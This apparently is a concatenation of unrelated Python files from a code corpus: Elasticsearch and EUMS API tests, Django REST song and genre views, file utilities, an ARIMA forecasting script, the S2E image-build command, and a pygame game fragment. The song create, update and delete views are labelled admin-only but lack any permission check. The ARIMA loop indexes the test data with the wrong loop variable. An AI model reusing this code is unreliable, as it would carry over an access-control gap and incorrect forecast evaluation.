@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_no_repo_dir(self, mock_es, mock_repo):
"""Function: test_no_repo_dir
Description: Test with no repo directory passed.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(self.repo), (False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_no_repo_name(self, mock_es, mock_repo):
"""Function: test_no_repo_name
Description: Test with no repo named passed.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo2,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(repo_dir=self.repo_dir),
(False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_default(self, mock_es, mock_repo):
"""Function: test_default
Description: Test with default settings.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(self.repo2, self.repo_dir),
(False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
if __name__ == "__main__":
unittest.main()
|
5,183 | ff53a549222b0d5e2fcb518c1e44b656c45ce76e | from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from playlist.models import Song, AccountSong, Genre, AccountGenre
from account.models import Account
from playlist.api.serializers import GenreSerializer, SongSerializer, AccountGenreSerializer
from rest_framework.generics import ListAPIView
# create a specific genre details by title
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def create_account_genre_view(request):
title = request.data.get('title', '0')
try:
genre = Genre.objects.get(title=title)
except Genre.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
data = {}
data['genre'] = genre.pk
data['account'] = request.user.pk
serializer = AccountGenreSerializer(data=data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Get a specific genre details by title
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def detail_genre_view(request):
title = request.data.get('title', '0')
try:
genre = Genre.objects.get(title=title)
except Genre.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = GenreSerializer(genre)
return Response(serializer.data)
# post a new song
@api_view(['POST'])
#admin
def create_song_view(request):
serializer = SongSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Get a specific song details by id
@api_view(['GET'])
def detail_song_view(request):
id = request.data.get('id', '0')
try:
song = Song.objects.get(id=id)
except Song.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = SongSerializer(song)
return Response(serializer.data)
# update a specific song details by id
@api_view(['PUT'])
#admin
def update_song_view(request):
id = request.data.get('id', '0')
try:
song = Song.objects.get(id=id)
except Song.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == "PUT":
serializer = SongSerializer(song, data=request.data)
data = {}
if serializer.is_valid():
serializer.save()
data["success"] = "update successful"
return Response(data=data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# delete a specific song details by id
@api_view(['DELETE'])
#admin
def delete_song_view(request):
id = request.data.get('id', '0')
try:
song = Song.objects.get(id=id)
except Song.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == "DELETE":
operation = song.delete()
data = {}
if operation:
data["success"] = "delete successful"
else:
data["failure"] = "delete failure"
return Response(data=data)
# GET all genres
# GET all account genres
# DELETE all account genres
# GET all songs (by account genres)
# POST liked genres
# POST liked songs
# GET whatsapp link
# POST create playlist
|
5,184 | be279fe44b0d52c9d473e08d8b9c28d5b6386b45 | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from dkfileutils.path import Path
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
# print "COPY:", locals()
# print "COPY:", ctx.force, ctx.verbose
if source == dest:
return dest
source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ""
if sys.platform == 'win32':
if force:
flags += " /Y"
# print 'copy {flags} {source} {dest}'.format(**locals())
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else: # pragma: nocover
if force:
flags += " --force"
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False) # noqa
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print("Opened:", dest, "for writing.")
for s in sources:
with open(s, 'r') as inp:
print(" appending:", s)
out.writelines(inp.readlines())
out.write('\n')
# flags = ""
# if sys.platform == 'win32':
# if force:
# flags += " /Y"
# source = '+'.join(sources)
# source = source.replace('/', '\\')
# ctx.run('copy {flags} {source} {dest}'.format(**locals()))
# else: # pragma: nocover
# if force:
# pass
# # flags += " --force"
# source = ' '.join(sources)
# # print 'cat {flags} {source} > {dest}'.format(**locals())
# ctx.run('cat {flags} {source} > {dest}'.format(**locals()))
fix_line_endings(dest)
# if len(line_endings(dest)) > 1:
# fix_line_endings(dest)
return dest
|
5,185 | d78ac5188cad104ee1b3e214898c41f843b6d8c0 | from sklearn.preprocessing import RobustScaler
from statsmodels.tsa.arima.model import ARIMA
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from math import sqrt
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import random
# set random seed
random.seed(1)
np.random.seed(1)
tf.random.set_random_seed(1)
random_sample_save_folder_path = '../c_data_processing/b_data_sampling/sampled_data/'
for i in range(1, 6):
df = pd.read_csv( random_sample_save_folder_path + 'power_demand_sample%i.csv' %i, index_col=0)
regions = df.columns
result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])
predict = pd.DataFrame()
for region in regions:
RE_demand = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0) # data initialization
RE_demand = RE_demand[region]
RE_demand = pd.DataFrame(RE_demand)
# train_test_split
train_test_split = int(len(RE_demand)*0.8)
train, test = RE_demand[:train_test_split], RE_demand[train_test_split:]
# data scaling
scaler = RobustScaler()
scaler = scaler.fit(RE_demand.values)
train_scaled = scaler.transform(train)
test_scaled = scaler.transform(test)
# model setting
history = [x for x in train_scaled]
test_pred = []
for j in range(len(test_scaled)):
model = ARIMA(history, order=(3,1,1)) # setting (p, d, q) guide : https://www.youtube.com/watch?v=YQF5PDDI9jo&list=LL&index=5
model_fit = model.fit()
output = model_fit.forecast()
yhat = output
test_pred.append(yhat)
obs = test_scaled[i]
history.append(obs)
test_pred = np.array(test_pred)
test_pred = scaler.inverse_transform(test_pred)
# model evalutaion
rmse = sqrt(mean_squared_error(test, test_pred))
r2 = r2_score(test, test_pred)
mae = mean_absolute_error(test, test_pred)
metrics = [rmse, r2, mae]
result['%s' %region] = metrics
performance_path = './ARIMA/performance/'
# data forecasting
forecast = model_fit.forecast(steps=24)
forecast = forecast.reshape(-1,1)
forecast = scaler.inverse_transform(forecast)
# data concatenate
test = np.array(['test']).reshape(-1, 1)
pred = np.array(['forecast']).reshape(-1, 1)
forecast = np.concatenate([test, test_pred, pred, forecast])
forecast = np.concatenate(forecast)
predict['%s' % region] = forecast
forecast_path = './ARIMA/forecast/'
if not os.path.exists(performance_path):
os.makedirs(performance_path)
result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)
if not os.path.exists(forecast_path):
os.makedirs(forecast_path)
predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i) |
5,186 | e5921edef3d3c56a73f2674f483ea4d1f3577629 | """
Copyright (c) 2017 Cyberhaven
Copyright (c) 2017 Dependable Systems Laboratory, EPFL
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import glob
import grp
import logging
import os
import pwd
import re
import socket
import time
from threading import Thread
import psutil
from psutil import NoSuchProcess
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import sh
from sh import ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import EnvCommand, CommandError
from s2e_env.utils import repos
from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, \
translate_image_name
logger = logging.getLogger('image_build')
def _get_user_groups(user_name):
"""
Get a list of groups for the user ``user_name``.
"""
groups = [g.gr_name for g in grp.getgrall() if user_name in g.gr_mem]
gid = pwd.getpwnam(user_name).pw_gid
groups.append(grp.getgrgid(gid).gr_name)
return groups
def _get_user_name():
"""
Get the current user.
"""
return pwd.getpwuid(os.getuid())[0]
def _user_belongs_to(group_name):
"""
Check that the current user belongs to the ``group_name`` group.
"""
user_name = _get_user_name()
groups = _get_user_groups(user_name)
return group_name in groups
def _raise_group_error(group_name):
raise CommandError(f'You must belong to the {group_name} group in order to build '
'images. Please run the following command, then logout '
'and login:\n\n'
f'\tsudo usermod -a -G {group_name} $(whoami)')
def _check_groups_docker():
"""
Check that the current user belongs to the required groups to both run S2E and build S2E images.
"""
if not _user_belongs_to('docker'):
_raise_group_error('docker')
def _check_groups_kvm():
"""Being member of KVM is required only when using KVM to build images"""
if not _user_belongs_to('libvirtd') and not _user_belongs_to('kvm'):
_raise_group_error('kvm')
def _check_virtualbox():
"""
Check if VirtualBox is running. VirtualBox conflicts with S2E's requirement for KVM, so VirtualBox must
*not* be running together with S2E.
"""
# Adapted from https://github.com/giampaolo/psutil/issues/132#issuecomment-44017679
# to avoid race conditions
for proc in psutil.process_iter():
try:
if proc.name() == 'VBoxHeadless':
raise CommandError('S2E uses KVM to build images. VirtualBox '
'is currently running, which is not '
'compatible with KVM. Please close all '
'VirtualBox VMs and try again.')
except NoSuchProcess:
pass
def _check_vmware():
"""
Check if VMWare is running. VMware conflicts with S2E's requirement for KVM, so VMWare must
*not* be running together with S2E.
"""
for proc in psutil.process_iter():
try:
if proc.name() == 'vmware-vmx':
raise CommandError('S2E uses KVM to build images. VMware '
'is currently running, which is not '
'compatible with KVM. Please close all '
'VMware VMs and try again.')
except NoSuchProcess:
pass
def _check_kvm():
"""
Check that the KVM interface exists. This is required by libs2e to communicate with QEMU.
"""
if not os.path.exists(os.path.join(os.sep, 'dev', 'kvm')):
raise CommandError('KVM interface not found - check that /dev/kvm '
'exists. Alternatively, you can disable KVM (-n '
'option) or download pre-built images (-d option)')
def _check_vmlinux():
"""
Check that /boot/vmlinux* files are readable. This is important for guestfish.
"""
try:
for f in glob.glob(os.path.join(os.sep, 'boot', 'vmlinu*')):
with open(f, 'rb'):
pass
except IOError:
raise CommandError('Make sure that the kernels in /boot are readable. '
'This is required for guestfish. Please run the '
'following command:\n\n'
'sudo chmod ugo+r /boot/vmlinu*') from None
# pylint: disable=no-member
def _check_cow(image_dir):
"""
Check that the file system that stores guest images supports copy-on-write.
"""
try:
src = f'{image_dir}/.cowcheck'
dst = f'{image_dir}/.cowcheck1'
sh.touch(src)
sh.cp('--reflink=always', src, dst)
return True
except Exception:
warn_msg = f"""
Copy-on-write check failed.
The file system where images are stored ({image_dir}) does not support copy-on-write.
It is recommended to use an XFS or BTRFS file system with copy-on-write enabled as a storage
location for S2E images, as this can save up to 60% of disk space. The building process checkpoints
intermediate build steps with cp --reflink=auto to make use of copy-on-write if it is available.
How to upgrade:
1. Create an XFS or BTRFS partition large enough to store the images that you need (~300 GB for all images).
Make sure you use reflink=1 to enable copy-on-write when running mkfs.xfs.
2. Create a directory for guest images on that partition (e.g., /mnt/disk1/images)
3. Delete the "images" folder in your S2E environment
4. Create in your S2E environment a symbolic link called "images" to the directory you created in step 2
"""
logger.warning(re.sub(r'^ {8}', '', warn_msg, flags=re.MULTILINE))
return False
finally:
sh.rm('-f', src)
sh.rm('-f', dst)
def _raise_invalid_image(image_name):
raise CommandError(f'Invalid image name: {image_name}. Run ``s2e image_build`` '
'to list available images')
def _get_base_image_and_app(image_name):
x = image_name.split('/')
if len(x) == 1:
return x[0], None
if len(x) == 2:
return x
raise CommandError(f'Invalid image name {image_name}')
def _has_app_image(image_names):
for name in image_names:
if '/' in name:
return True
return False
def _check_product_keys(image_descriptors, image_names):
missing_keys = []
for image_name in image_names:
image = image_descriptors[image_name]
if 'product_key' in image:
if not image['product_key']:
missing_keys.append(image_name)
ios = image_descriptors[image_name].get('os', {})
if 'product_key' in ios:
if not ios['product_key']:
missing_keys.append(image_name)
if missing_keys:
logger.error('The following images require a product key:')
for image in missing_keys:
logger.error(' * %s', image)
raise CommandError('Please update images.json and/or apps.json.')
def _check_iso(templates, app_templates, iso_dir, image_names):
for image_name in image_names:
base_image, app_name = _get_base_image_and_app(image_name)
descriptors = [templates[base_image]]
if app_name:
descriptors.append(app_templates[app_name])
for desc in descriptors:
iso = desc.get('iso', {})
if iso.get('url', ''):
continue
name = iso.get('name', '')
if not name:
continue
if not iso_dir:
raise CommandError(
'Please use the --iso-dir option to specify the path '
f'to a folder that contains {name}'
)
path = os.path.join(iso_dir, name)
if not os.path.exists(path):
raise CommandError(f'The image {image_name} requires {path}, which could not be found')
def _is_port_available(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def _start_ftp_server(image_path, port):
authorizer = DummyAuthorizer()
authorizer.add_anonymous(image_path, perm='elradfmwMT')
handler = FTPHandler
handler.authorizer = authorizer
handler.masquerade_address = '10.0.2.2'
# QEMU slirp won't let the guest reconnect if timeout happens, so we disable it
handler.timeout = None
server = FTPServer(("127.0.0.1", port), handler)
thread = Thread(target=_run_ftp_server, args=[server])
thread.daemon = True
thread.start()
time.sleep(1)
return server
def _run_ftp_server(server):
try:
server.serve_forever()
finally:
logger.info('FTP server terminated')
server.close_all()
def _get_archive_rules(image_path, rule_names):
if _has_app_image(rule_names):
raise CommandError('Building archives of app images is not supported yet')
archive_rules = []
for r in rule_names:
archive_rules.append(os.path.join(image_path, f'{r}.tar.xz'))
logger.info('The following archives will be built:')
for a in archive_rules:
logger.info(' * %s', a)
return archive_rules
def _download_images(image_path, image_names, templates):
if _has_app_image(image_names):
raise CommandError('Downloading of app images is not supported yet')
image_downloader = ImageDownloader(templates)
image_downloader.download_images(image_names, image_path)
logger.info('Successfully downloaded images: %s', ', '.join(image_names))
class Command(EnvCommand):
"""
Builds an image.
"""
help = 'Build an image.'
def __init__(self):
super().__init__()
self._headless = True
self._use_kvm = True
self._num_cores = 1
self._has_cow = False
def add_arguments(self, parser):
super().add_arguments(parser)
parser.add_argument('name',
help='The name of the image to build. If empty,'
' shows available images', nargs='*')
parser.add_argument('-g', '--gui', action='store_true',
help='Display QEMU GUI during image build')
parser.add_argument('-c', '--cores', required=False, default=2,
type=int,
help='The number of cores used when building the '
'VM image. Defaults to 2')
parser.add_argument('-x', '--clean', action='store_true',
help='Deletes all images and rebuild them from '
'scratch')
parser.add_argument('-a', '--archive', action='store_true',
help='Creates an archive for the specified image')
parser.add_argument('-p', '--ftp-port', required=False, default=15468, type=int,
help='Port for the internal FTP server to receive files from guest VMs during build')
parser.add_argument('-d', '--download', action='store_true',
help='Download image from the repository instead '
'of building it')
parser.add_argument('-i', '--iso-dir',
help='Path to folder that stores ISO files of Windows images')
parser.add_argument('-n', '--no-kvm', action='store_true',
help='Disable KVM during image build')
def handle(self, *args, **options):
# If DISPLAY is missing, don't use headless mode
if options['gui']:
self._headless = False
# If KVM has been explicitly disabled, don't use it during the build
if options['no_kvm']:
self._use_kvm = False
self._num_cores = options['cores']
# The path could have been deleted by a previous clean
if not os.path.exists(self.image_path()):
os.makedirs(self.image_path())
img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
if options['clean']:
self._invoke_make(img_build_dir, ['clean'])
return
image_names = options['name']
templates = get_image_templates(img_build_dir)
app_templates = get_app_templates(img_build_dir)
images, image_groups, image_descriptors = get_all_images(templates, app_templates)
if not image_names:
self._print_image_list(images, image_groups, image_descriptors)
print('\nRun ``s2e image_build <name>`` to build an image. '
'Note that you must run ``s2e build`` **before** building '
'an image')
return
image_names = translate_image_name(images, image_groups, image_names)
logger.info('The following images will be built:')
for image in image_names:
logger.info(' * %s', image)
if options['download']:
_download_images(self.image_path(), image_names, templates)
return
rule_names = image_names
if options['archive']:
rule_names = _get_archive_rules(self.image_path(), image_names)
iso_dir = os.path.abspath(options['iso_dir']) if options['iso_dir'] else None
# Check for optional product keys and iso directories.
# These may or may not be required, depending on the set of images.
_check_product_keys(image_descriptors, image_names)
_check_iso(templates, app_templates, iso_dir, image_names)
if self._use_kvm:
_check_kvm()
_check_groups_kvm()
_check_groups_docker()
_check_vmlinux()
self._has_cow = _check_cow(self.image_path())
if self._use_kvm:
_check_virtualbox()
_check_vmware()
if not _is_port_available(options['ftp_port']):
raise CommandError(f'localhost:{options["ftp_port"]} is not available. Check that the port is free or '
'specify a port with --ftp-port')
# Clone kernel if needed.
# This is necessary if the s2e env has been initialized with -b flag.
self._clone_kernel()
server = _start_ftp_server(self.image_path(), options['ftp_port'])
self._invoke_make(img_build_dir, rule_names, options['ftp_port'], iso_dir)
logger.success('Built image(s) \'%s\'', ' '.join(image_names))
server.close_all()
def _invoke_make(self, img_build_dir, rule_names, ftp_port=0, iso_dir=''):
env = os.environ.copy()
env['S2E_INSTALL_ROOT'] = self.install_path()
env['S2E_LINUX_KERNELS_ROOT'] = \
self.source_path(CONSTANTS['repos']['images']['linux'])
env['OUTDIR'] = self.image_path()
env['QEMU_FTP_PORT'] = str(ftp_port)
env['ISODIR'] = iso_dir if iso_dir else ''
env['DEBUG_INTERMEDIATE_RULES'] = '1' if self._has_cow else '0'
logger.debug('Invoking makefile with:')
logger.debug('export S2E_INSTALL_ROOT=%s', env['S2E_INSTALL_ROOT'])
logger.debug('export S2E_LINUX_KERNELS_ROOT=%s', env['S2E_LINUX_KERNELS_ROOT'])
logger.debug('export OUTDIR=%s', env['OUTDIR'])
logger.debug('export ISODIR=%s', env.get('ISODIR', ''))
logger.debug('export DEBUG_INTERMEDIATE_RULES=%s', env.get('DEBUG_INTERMEDIATE_RULES', ''))
if self._headless:
logger.warning('Image creation will run in headless mode. '
'Use --gui to see graphic output for debugging')
else:
env['GRAPHICS'] = ''
if not self._use_kvm:
env['QEMU_KVM'] = ''
logger.warning('Image build without KVM. This will be slow')
try:
make = sh.Command('make').bake(file=os.path.join(img_build_dir,
'Makefile'),
directory=self.image_path(),
_env=env, _fg=True)
make_image = make.bake(j=self._num_cores, r=True, warn_undefined_variables=True)
make_image(sorted(rule_names))
except ErrorReturnCode as e:
raise CommandError(e) from e
def _clone_kernel(self):
kernels_root = self.source_path(CONSTANTS['repos']['images']['linux'])
if os.path.exists(kernels_root):
logger.info('Kernel repository already exists in %s', kernels_root)
return
logger.info('Cloning kernels repository to %s', kernels_root)
kernels_repo = CONSTANTS['repos']['images']['linux']
repos.git_clone_to_source(self.env_path(), kernels_repo)
def _print_image_list(self, images, image_groups, image_descriptors):
img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
templates = get_image_templates(img_build_dir)
if not templates:
images_json_path = os.path.join(img_build_dir, 'images.json')
raise CommandError('No images available to build. Make sure that '
f'{images_json_path} exists and is valid')
def get_max_len(lst):
ret = 0
for item in lst:
if len(item) > ret:
ret = len(item)
return ret
print('Available image groups:')
max_group_len = get_max_len(image_groups)
for group in image_groups:
print(f' * {group:{max_group_len}} - Build {group} images')
print('\nAvailable images:')
max_image_len = get_max_len(images)
for image in sorted(images):
print(f' * {image:{max_image_len}} - {image_descriptors[image]["name"]}')
def _print_apps_list(self):
img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
app_templates = get_app_templates(img_build_dir)
if not app_templates:
apps_json_path = os.path.join(img_build_dir, 'apps.json')
raise CommandError('No apps available to build. Make sure that '
f'{apps_json_path} exists and is valid')
print('Available applications:')
for app_template, desc in sorted(app_templates.items()):
for base_image in desc['base_images']:
print(f' * {base_image}/{app_template} - {desc["name"]}')
|
5,187 | 1152f144e17c11416f9ed56b4408f18615b16dc2 | from eums.test.api.api_test_helpers import create_option
from eums.test.factories.question_factory import MultipleChoiceQuestionFactory
from eums.test.api.authenticated_api_test_case import AuthenticatedAPITestCase
from eums.test.config import BACKEND_URL
from eums.models.question import MultipleChoiceQuestion
ENDPOINT_URL = BACKEND_URL + 'option/'
RECEIVED_OPTIONS_ENDPOINT_URL = BACKEND_URL + 'received-options/'
QUALITY_OPTIONS_ENDPOINT_URL = BACKEND_URL + 'quality-options/'
SATISFIED_OPTIONS_ENDPOINT_URL = BACKEND_URL + 'satisfied-options/'
class OptionsEndPointTest(AuthenticatedAPITestCase):
def test_should_create_item(self):
question = MultipleChoiceQuestionFactory()
option_details = {'text': "Bad", 'question': question.id}
response = self.client.post(ENDPOINT_URL, option_details, format='json')
self.assertEqual(response.status_code, 201)
self.assertDictContainsSubset(option_details, response.data)
def test_should_get_options_sorted_by_text(self):
question = MultipleChoiceQuestionFactory()
option_one_details = {'text': "B Option", 'question': question.id}
option_two_details = {'text': "A Option", 'question': question.id}
create_option(self, option_one_details)
create_option(self, option_two_details)
get_response = self.client.get(ENDPOINT_URL)
self.assertEqual(get_response.status_code, 200)
self.assertDictContainsSubset(option_two_details, get_response.data[0])
self.assertDictContainsSubset(option_one_details, get_response.data[1])
class ReceivedOptionsEndPointTest(AuthenticatedAPITestCase):
def test_should_only_get_received_options(self):
received_question,_ = MultipleChoiceQuestion.objects.get_or_create(
uuids=['6c1cf97d-59b8-4bd3-815b-783abd3dfad9'],
text='Was product received?', label='productReceived'
)
other_question = MultipleChoiceQuestionFactory()
option_one_details = {'text': "Yes", 'question': received_question.id}
option_two_details = {'text': "No", 'question': received_question.id}
option_three_details = {'text': "Other", 'question': other_question.id}
create_option(self, option_one_details)
create_option(self, option_two_details)
create_option(self, option_three_details)
get_response = self.client.get(RECEIVED_OPTIONS_ENDPOINT_URL)
self.assertEqual(get_response.status_code, 200)
self.assertDictContainsSubset(option_one_details, get_response.data[0])
self.assertDictContainsSubset(option_two_details, get_response.data[2])
self.assertNotIn(option_three_details, get_response.data)
class QualityOptionsEndPointTest(AuthenticatedAPITestCase):
def test_should_only_get_quality_options_sorted_by_text(self):
quality_question,_ = MultipleChoiceQuestion.objects.get_or_create(
uuids=['6c1cf92d-59b8-4bd3-815b-783abd3dfad9'],
text='What is the quality of the product?', label='qualityOfProduct'
)
other_question = MultipleChoiceQuestionFactory()
option_one_details = {'text': "B Option", 'question': quality_question.id}
option_two_details = {'text': "A Option", 'question': quality_question.id}
option_three_details = {'text': "C Option", 'question': other_question.id}
create_option(self, option_one_details)
create_option(self, option_two_details)
create_option(self, option_three_details)
get_response = self.client.get(QUALITY_OPTIONS_ENDPOINT_URL)
self.assertEqual(get_response.status_code, 200)
self.assertDictContainsSubset(option_two_details, get_response.data[0])
self.assertDictContainsSubset(option_one_details, get_response.data[1])
self.assertNotIn(option_three_details, get_response.data)
class SatisfiedOptionsEndPointTest(AuthenticatedAPITestCase):
def test_should_only_get_satisfied_options(self):
satisfied_question,_ = MultipleChoiceQuestion.objects.get_or_create(
uuids=['6c1cf27d-59b8-4bd3-815b-783abd3dfad9'],
text='Are you satisfied with the product?', label='satisfiedWithProduct'
)
other_question = MultipleChoiceQuestionFactory()
option_one_details = {'text': "Yes", 'question': satisfied_question.id}
option_two_details = {'text': "No", 'question': satisfied_question.id}
option_three_details = {'text': "Other", 'question': other_question.id}
create_option(self, option_one_details)
create_option(self, option_two_details)
create_option(self, option_three_details)
get_response = self.client.get(SATISFIED_OPTIONS_ENDPOINT_URL)
self.assertEqual(get_response.status_code, 200)
self.assertDictContainsSubset(option_one_details, get_response.data[0])
self.assertDictContainsSubset(option_two_details, get_response.data[2])
self.assertNotIn(option_three_details, get_response.data) |
5,188 | 0dd5511c0e39f113c46785be78a898e79bc45a21 | import pygame
import os
import random
#Vx = float(input("Input Vx : "))
#Vy = float(input("Input Vy : "))
Vx = 20
Vy = 20
#GEOMETRY
screen_width = 1000
screen_height = 600
FPS = 30
#COLOR
BLUE = (0, 0, 255)
BLACK = (0, 0, 0)
GREEN = (204, 153, 255)
RED = (255, 0, 0)
WHITE = (155, 25, 0)
colorList = [BLUE, BLACK, GREEN, RED, WHITE]
#Initialize pygame
pygame.init()
path = os.path.dirname(__file__)
img_path = os.path.join(path, 'Gallery')
background = pygame.image.load('Gallery/parallax.png')
background = pygame.transform.scale(background, [screen_width, screen_height])
win = pygame.display.set_mode([screen_width, screen_height])
pygame.display.set_caption("Stateczek shoot Projectile")
clock = pygame.time.Clock()
pixelRatio = 10
accel = -9.81
timeStep = 1 / FPS
font = pygame.font.SysFont('comic', 50, False, False)
#####CREATE SPRITE#####
class player(pygame.sprite.Sprite):
image = pygame.image.load(os.path.join(path, 'Gallery', 'life.png')) # เรียกรูปตัวละครมาเก็บในตัวแปร
def __init__(self, x, y): # ฟังก์ชั่นนี้เอาไว้กำหนดตัวแปร
pygame.sprite.Sprite.__init__(self)
self.x = x
self.y = y
self.move = 10
def draw(self, win):
win.blit(self.image, (self.x, self.y))
#####CREATE PROJECTILE SHOOT#####
class projectile(pygame.sprite.Sprite):
def __init__(self, x, y, ux, uy):
pygame.sprite.Sprite.__init__(self)
self.x = x + 30
self.y = y
self.startX = self.x
self.startY = self.y
self.horVel = ux
self.verVel = uy
self.color = random.choice(colorList)
self.bulletTime = 0.0
self.status = 1
def update(self):
global maxHeight
global maxHeightPos
global landingPos
global ranges
global trace
if self.y <= screen_height:
self.bulletTime += timeStep
self.x = (self.horVel * self.bulletTime) * pixelRatio + self.startX
self.y = -(self.verVel * self.bulletTime + 0.5 * accel * (
self.bulletTime ** 2)) * pixelRatio + self.startY
trace.append([self.x, self.y])
if self.x >= screen_width:
self.status = 0
if self.y < 0:
self.status = 0
else: # กระสุนลงพื้น
self.status = 0
pygame.display.update()
def draw(self, win):
pygame.draw.circle(win, self.color, (round(self.x), round(self.y)), 6)
for t in traceShow:
pygame.draw.circle(win, self.color, (round(t[0]), round(t[1])), 1)
#####CREATE ENEMYS#####
class enemy(pygame.sprite.Sprite):
im = pygame.image.load(os.path.join(path, 'Gallery', 'stateczek.png'))
im2 = pygame.image.load(os.path.join(path, 'Gallery', 'stateczek.png'))
im3 = pygame.image.load(os.path.join(path, 'Gallery', 'stateczek.png'))
imageList = [im, im2, im3]
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.x = x
self.y = y
self.hitbox = (self.x, self.y, 60, 60)
self.vel = 6
self.imageRandom = random.choice(self.imageList)
def draw(self, win):
self.move_enemy()
win.blit(self.imageRandom, (self.x, self.y))
def move_enemy(self):
if self.vel > 0:
if self.y + self.vel < 560:
self.y += self.vel
self.hitbox = (self.x, self.y, 60, 60)
else:
self.vel = self.vel * -1
else:
if self.y - self.vel > 10:
self.y += self.vel
self.hitbox = (self.x, self.y, 60, 60)
else:
self.vel = self.vel * -1
#####FUNCTION SHOW DISPLAY####
def display(s):
win.blit(background, (0, 0))
player1.draw(win)
